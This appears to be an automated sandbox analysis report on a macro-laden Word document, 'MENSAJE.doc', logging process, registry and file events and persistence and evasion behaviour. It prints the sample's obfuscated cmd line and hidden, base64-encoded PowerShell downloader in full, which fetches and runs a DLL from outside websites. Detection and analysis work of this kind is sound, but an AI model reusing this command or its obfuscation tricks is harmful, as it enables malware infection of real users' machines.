Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095398011.000000001B840000.00000002.00000001.sdmp

Source: MENSAJE.doc

Initial sample: OLE summary subject = Outdoors, Outdoors & Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: MENSAJE.doc	Stream path 'Macros/VBA/Uved9u320lyen' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Uved9u320lyen			Name: Uved9u320lyen

Document contains an embedded VBA with many randomly named variables

Show sources

Source: MENSAJE.doc

Stream path 'Macros/VBA/Uved9u320lyen' : High entropy of concatenated variable names

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: MENSAJE.doc	Stream path 'Macros/VBA/Uved9u320lyen' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Uved9u320lyen			Name: Uved9u320lyen

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcA

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC			Jump to behavior

Source: D64O.dll.5.dr

Static PE information: real checksum: 0x5c7a7 should be: 0x57fde

Source: D64O.dll.5.dr	Static PE information: section name: .text4
Source: D64O.dll.5.dr	Static PE information: section name: .text8
Source: D64O.dll.5.dr	Static PE information: section name: .text7
Source: D64O.dll.5.dr	Static PE information: section name: .text6
Source: D64O.dll.5.dr	Static PE information: section name: .text5

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002108D0 push edx; ret	7_2_002109D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F39A0 push cs; ret	7_2_001F39A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F2A01 push esi; ret	7_2_001F2A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5BD8 push ss; iretd	7_2_001F5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5C29 push ss; iretd	7_2_001F5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F548F push ebp; retf	7_2_001F5496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F2CFB push ecx; retn 001Eh	7_2_001F2D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F1740 push DA0FDC41h; iretd	7_2_001F1745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002108D0 push edx; ret	8_2_002109D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F39A0 push cs; ret	8_2_001F39A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F2A01 push esi; ret	8_2_001F2A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F5BD8 push ss; iretd	8_2_001F5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F5C29 push ss; iretd	8_2_001F5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F548F push ebp; retf	8_2_001F5496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F2CFB push ecx; retn 001Eh	8_2_001F2D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F1740 push DA0FDC41h; iretd	8_2_001F1745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001908D0 push edx; ret	9_2_001909D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001739A0 push cs; ret	9_2_001739A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00172A01 push esi; ret	9_2_00172A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00175BD8 push ss; iretd	9_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00175C29 push ss; iretd	9_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0017548F push ebp; retf	9_2_00175496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00172CFB push ecx; retn 001Eh	9_2_00172D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00171740 push DA0FDC41h; iretd	9_2_00171745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002808D0 push edx; ret	10_2_002809D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002639A0 push cs; ret	10_2_002639A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00262A01 push esi; ret	10_2_00262A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00265BD8 push ss; iretd	10_2_00265C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00265C29 push ss; iretd	10_2_00265C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026548F push ebp; retf	10_2_00265496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00262CFB push ecx; retn 001Eh	10_2_00262D01

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Liq8l58\Egok7ei\D64O.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ceelf\ceht.ynf:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
